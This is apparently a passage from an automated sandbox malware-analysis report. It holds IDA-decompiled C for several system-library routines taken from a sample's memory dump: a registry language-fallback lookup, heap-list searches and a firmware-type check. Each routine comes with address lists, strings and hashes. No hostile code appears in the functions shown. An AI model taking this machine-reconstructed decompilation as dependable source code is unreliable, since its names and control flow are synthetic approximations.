				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E017BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E017F95D0();
						}
						if(_t78 != 0) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E017FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E017FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E017F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E017FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L017BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E017FBB40(_t83, _t102 + 0x24, _t78);
								if(L017C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E017FBB40(_t84, _t102 + 0x24, _t94);
									if(L017C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                    0x017be620
                                                    0x017be628
                                                    0x017be62f
                                                    0x017be631
                                                    0x017be635
                                                    0x017be637
                                                    0x017be63e
                                                    0x01815503
                                                    0x01815503
                                                    0x017be64c
                                                    0x017be64c
                                                    0x017be651
                                                    0x00000000
                                                    0x00000000
                                                    0x017be661
                                                    0x017be665
                                                    0x0181542a
                                                    0x017be715
                                                    0x017be71a
                                                    0x017be71c
                                                    0x017be720
                                                    0x017be720
                                                    0x017be727
                                                    0x017be736
                                                    0x017be736
                                                    0x017be743
                                                    0x017be743
                                                    0x017be673
                                                    0x017be678
                                                    0x017be67d
                                                    0x017be682
                                                    0x017be685
                                                    0x017be692
                                                    0x017be69b
                                                    0x017be6a3
                                                    0x017be6ad
                                                    0x017be6b1
                                                    0x017be6b2
                                                    0x017be6bb
                                                    0x017be6bf
                                                    0x017be6c0
                                                    0x017be6c8
                                                    0x017be6cc
                                                    0x017be6d5
                                                    0x017be6d9
                                                    0x00000000
                                                    0x00000000
                                                    0x017be6e5
                                                    0x017be6ea
                                                    0x017be6f9
                                                    0x017be70b
                                                    0x017be70f
                                                    0x01815439
                                                    0x0181545e
                                                    0x0181545e
                                                    0x00000000
                                                    0x0181545e
                                                    0x0181543b
                                                    0x0181543e
                                                    0x01815440
                                                    0x01815445
                                                    0x01815472
                                                    0x01815475
                                                    0x0181548d
                                                    0x01815493
                                                    0x018154a9
                                                    0x00000000
                                                    0x00000000
                                                    0x018154ab
                                                    0x018154b4
                                                    0x018154bc
                                                    0x018154c8
                                                    0x018154de
                                                    0x018154fb
                                                    0x018154e0
                                                    0x018154e6
                                                    0x018154eb
                                                    0x018154eb
                                                    0x018154de
                                                    0x00000000
                                                    0x018154bc
                                                    0x01815477
                                                    0x0181547a
                                                    0x01815480
                                                    0x01815483
                                                    0x01815486
                                                    0x0181548b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0181548b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x01815447
                                                    0x01815447
                                                    0x01815447
                                                    0x01815447
                                                    0x0181544e
                                                    0x00000000
                                                    0x00000000
                                                    0x01815450
                                                    0x01815452
                                                    0x01815455
                                                    0x0181545a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0181545c
                                                    0x0181546a
                                                    0x0181546d
                                                    0x0181546f
                                                    0x00000000
                                                    0x0181546f
                                                    0x017be70f

                                                    Strings
                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 017BE68C
                                                    • @, xrefs: 017BE6C0
                                                    • InstallLanguageFallback, xrefs: 017BE6DB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                    • API String ID: 0-1757540487
                                                    • Opcode ID: 4c747d8ef2faa26b152b7d66ce0fc0ab720cc4df2f069424ff2d571a84e8579a
                                                    • Instruction ID: 1fa2028a6c33da0c5ba513b17937188640451e98349334476eff680da98cbe9b
                                                    • Opcode Fuzzy Hash: 4c747d8ef2faa26b152b7d66ce0fc0ab720cc4df2f069424ff2d571a84e8579a
                                                    • Instruction Fuzzy Hash: B851A2B25083069BD710DF68C484BABF7E8AF89714F05092EFA85D7344EB34DA04C792
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DB8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E017DB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x18a8748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E017BB150();
						} else {
							E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E017BB150();
						__eflags =  *0x18a7bc8;
						if(__eflags == 0) {
							E01872073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E017DAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                    0x017db8f0
                                                    0x017db8f2
                                                    0x017db8f4
                                                    0x01822c4e
                                                    0x01822c50
                                                    0x01822c56
                                                    0x01822c5c
                                                    0x01822c60
                                                    0x01822c7f
                                                    0x01822c84
                                                    0x01822c62
                                                    0x01822c77
                                                    0x01822c7c
                                                    0x01822c8a
                                                    0x01822c8f
                                                    0x01822c94
                                                    0x01822c9c
                                                    0x01822ca5
                                                    0x01822ca5
                                                    0x01822c9c
                                                    0x01822c50
                                                    0x017db8fa
                                                    0x017db902
                                                    0x017db921
                                                    0x017db921
                                                    0x017db924
                                                    0x017db924
                                                    0x017db927
                                                    0x00000000
                                                    0x00000000
                                                    0x017db929
                                                    0x017db92b
                                                    0x017db92d
                                                    0x017db940
                                                    0x00000000
                                                    0x017db940
                                                    0x017db932
                                                    0x017db932
                                                    0x00000000
                                                    0x017db932
                                                    0x00000000
                                                    0x017db904
                                                    0x017db904
                                                    0x017db90a
                                                    0x017db90c
                                                    0x017db916
                                                    0x017db919
                                                    0x017db915
                                                    0x017db915
                                                    0x017db91b
                                                    0x017db91b
                                                    0x00000000
                                                    0x017db910

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-2558761708
                                                    • Opcode ID: c2e958bba5ec251f5aa9b731b03a326b68b0a2c2d9805aa45298a3638bd82441
                                                    • Instruction ID: d420601f8a8d2ba30242339b1c8c691a69e762ee46388982f842aec10d1be05c
                                                    • Opcode Fuzzy Hash: c2e958bba5ec251f5aa9b731b03a326b68b0a2c2d9805aa45298a3638bd82441
                                                    • Instruction Fuzzy Hash: 0111263130414ADFDB29D719C495B39F7B6EF81620F16816DE406CB345DB30D984C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0187E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 60%
                                                    			E0187E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0187BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0187BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0187AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E017F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0187A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0187A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E017F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0187A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0187A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E017D2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E017CB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E017CFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E017D7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0186FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                    0x0187e547
                                                    0x0187e549
                                                    0x0187e54f
                                                    0x0187e553
                                                    0x0187e557
                                                    0x0187e55a
                                                    0x0187e55c
                                                    0x0187e55f
                                                    0x0187e561
                                                    0x0187e567
                                                    0x0187e56b
                                                    0x0187e7e2
                                                    0x00000000
                                                    0x0187e571
                                                    0x0187e575
                                                    0x0187e577
                                                    0x0187e57b
                                                    0x0187e57c
                                                    0x0187e57d
                                                    0x0187e57e
                                                    0x0187e57f
                                                    0x0187e588
                                                    0x0187e58f
                                                    0x0187e591
                                                    0x0187e592
                                                    0x0187e592
                                                    0x0187e596
                                                    0x0187e59e
                                                    0x0187e5a0
                                                    0x0187e5a6
                                                    0x0187e61d
                                                    0x0187e61d
                                                    0x0187e621
                                                    0x0187e623
                                                    0x0187e630
                                                    0x0187e630
                                                    0x0187e7e6
                                                    0x0187e7eb
                                                    0x0187e7ed
                                                    0x0187e7f4
                                                    0x0187e7fa
                                                    0x0187e7ff
                                                    0x0187e7ff
                                                    0x0187e80a
                                                    0x0187e812
                                                    0x0187e812
                                                    0x0187e5ab
                                                    0x0187e5b4
                                                    0x0187e5b9
                                                    0x0187e5be
                                                    0x0187e5c0
                                                    0x0187e5c2
                                                    0x0187e5c8
                                                    0x0187e5c9
                                                    0x0187e5cb
                                                    0x0187e5cc
                                                    0x0187e5d5
                                                    0x0187e5e4
                                                    0x0187e5f1
                                                    0x0187e5f8
                                                    0x0187e5f8
                                                    0x0187e5d5
                                                    0x0187e602
                                                    0x0187e616
                                                    0x0187e63d
                                                    0x0187e644
                                                    0x0187e64d
                                                    0x0187e652
                                                    0x0187e657
                                                    0x0187e659
                                                    0x0187e65b
                                                    0x0187e661
                                                    0x0187e662
                                                    0x0187e664
                                                    0x0187e665
                                                    0x0187e66e
                                                    0x0187e67d
                                                    0x0187e68a
                                                    0x0187e691
                                                    0x0187e691
                                                    0x0187e66e
                                                    0x0187e6b0
                                                    0x00000000
                                                    0x0187e6b6
                                                    0x0187e6bd
                                                    0x0187e6c7
                                                    0x0187e6d7
                                                    0x0187e6d9
                                                    0x0187e6db
                                                    0x0187e6de
                                                    0x0187e6e3
                                                    0x0187e6f3
                                                    0x0187e6fc
                                                    0x0187e700
                                                    0x0187e700
                                                    0x0187e704
                                                    0x0187e70a
                                                    0x0187e70a
                                                    0x0187e713
                                                    0x0187e716
                                                    0x0187e719
                                                    0x0187e720
                                                    0x0187e761
                                                    0x0187e76b
                                                    0x0187e774
                                                    0x0187e77a
                                                    0x0187e77a
                                                    0x0187e78a
                                                    0x0187e791
                                                    0x0187e799
                                                    0x0187e79b
                                                    0x0187e79f
                                                    0x0187e7aa
                                                    0x0187e7c0
                                                    0x0187e7ac
                                                    0x0187e7b2
                                                    0x0187e7b9
                                                    0x0187e7b9
                                                    0x0187e7c7
                                                    0x0187e806
                                                    0x00000000
                                                    0x0187e7c9
                                                    0x0187e7d1
                                                    0x0187e7d8
                                                    0x00000000
                                                    0x0187e7d8
                                                    0x00000000
                                                    0x00000000
                                                    0x0187e722
                                                    0x0187e72e
                                                    0x0187e748
                                                    0x0187e74c
                                                    0x0187e754
                                                    0x0187e756
                                                    0x0187e75c
                                                    0x0187e75c
                                                    0x00000000
                                                    0x0187e75c
                                                    0x0187e758
                                                    0x0187e758
                                                    0x00000000
                                                    0x0187e758
                                                    0x0187e750
                                                    0x00000000
                                                    0x00000000
                                                    0x0187e752
                                                    0x00000000
                                                    0x0187e752
                                                    0x0187e730
                                                    0x0187e735
                                                    0x0187e73d
                                                    0x0187e73f
                                                    0x00000000
                                                    0x00000000
                                                    0x0187e741
                                                    0x0187e741
                                                    0x00000000
                                                    0x0187e741
                                                    0x0187e739
                                                    0x00000000
                                                    0x00000000
                                                    0x0187e73b
                                                    0x00000000
                                                    0x0187e73b
                                                    0x0187e722
                                                    0x0187e720
                                                    0x0187e6b0
                                                    0x0187e618
                                                    0x00000000
                                                    0x0187e618

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `$`
                                                    • API String ID: 0-197956300
                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                    • Instruction ID: 47b2db64c2f73b605350b348892826e6ec8acfd2b031a3aa5d046dd24c9c6505
                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                    • Instruction Fuzzy Hash: 1991A1312043469FE724CE29C845B1BBBE6BF84754F18896DF6A5CB290E774EA04CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 018351BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E018351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18905f0);
				E0180D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E017CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E018353CA(0);
						return E0180D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E017FF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E017D3690(1, _t117, 0x1791810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E017FAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L017D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E017FAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0183500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E017F9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                    0x018351be
                                                    0x018351c3
                                                    0x018351c8
                                                    0x018351cd
                                                    0x018351d0
                                                    0x018351d3
                                                    0x018351d8
                                                    0x018351db
                                                    0x018351de
                                                    0x018351e0
                                                    0x018351e3
                                                    0x018351e6
                                                    0x018351e8
                                                    0x01835342
                                                    0x01835351
                                                    0x01835356
                                                    0x0183535a
                                                    0x01835360
                                                    0x01835363
                                                    0x01835366
                                                    0x01835369
                                                    0x01835369
                                                    0x0183536b
                                                    0x0183536b
                                                    0x01835370
                                                    0x018353a3
                                                    0x018353a4
                                                    0x018353a6
                                                    0x018353ab
                                                    0x018353ab
                                                    0x018353ae
                                                    0x018353ae
                                                    0x018353b5
                                                    0x018353bf
                                                    0x018353bf
                                                    0x01835375
                                                    0x01835396
                                                    0x018353a0
                                                    0x018353a0
                                                    0x00000000
                                                    0x01835396
                                                    0x01835377
                                                    0x01835379
                                                    0x0183537f
                                                    0x0183538c
                                                    0x01835390
                                                    0x00000000
                                                    0x01835390
                                                    0x018351ee
                                                    0x018351f1
                                                    0x01835301
                                                    0x01835310
                                                    0x01835315
                                                    0x01835318
                                                    0x0183531b
                                                    0x01835320
                                                    0x0183532e
                                                    0x01835331
                                                    0x00000000
                                                    0x01835331
                                                    0x01835328
                                                    0x01835329
                                                    0x00000000
                                                    0x01835329
                                                    0x018351fa
                                                    0x01835235
                                                    0x01835236
                                                    0x01835239
                                                    0x0183523f
                                                    0x01835240
                                                    0x01835241
                                                    0x01835242
                                                    0x01835246
                                                    0x01835247
                                                    0x0183524e
                                                    0x01835251
                                                    0x01835267
                                                    0x01835269
                                                    0x0183526e
                                                    0x0183527d
                                                    0x0183527e
                                                    0x01835281
                                                    0x01835282
                                                    0x01835287
                                                    0x01835288
                                                    0x0183528a
                                                    0x0183528f
                                                    0x01835294
                                                    0x00000000
                                                    0x00000000
                                                    0x0183529a
                                                    0x0183529c
                                                    0x0183529e
                                                    0x0183529e
                                                    0x018352a4
                                                    0x018352b0
                                                    0x00000000
                                                    0x00000000
                                                    0x018352ba
                                                    0x018352bc
                                                    0x018352bc
                                                    0x018352d4
                                                    0x018352d9
                                                    0x018352dc
                                                    0x018352e1
                                                    0x00000000
                                                    0x00000000
                                                    0x018352e7
                                                    0x018352f4
                                                    0x00000000
                                                    0x018352f4
                                                    0x01835270
                                                    0x00000000
                                                    0x01835270
                                                    0x018351fc
                                                    0x018351fd
                                                    0x01835202
                                                    0x01835203
                                                    0x01835205
                                                    0x0183520a
                                                    0x0183520f
                                                    0x00000000
                                                    0x00000000
                                                    0x0183521b
                                                    0x01835226
                                                    0x0183522b
                                                    0x0183521d
                                                    0x0183521d
                                                    0x01835222
                                                    0x01835222
                                                    0x0183522d
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: Legacy$UEFI
                                                    • API String ID: 2994545307-634100481
                                                    • Opcode ID: acaa6e31e61caed4e801760308e2057d6d634b41a3c7b8ce5b2cc8df34cc8fde
                                                    • Instruction ID: b49aaca841455568e83b02c1c9beca83e7e1a2a5cc33946e9b54f4a85add4572
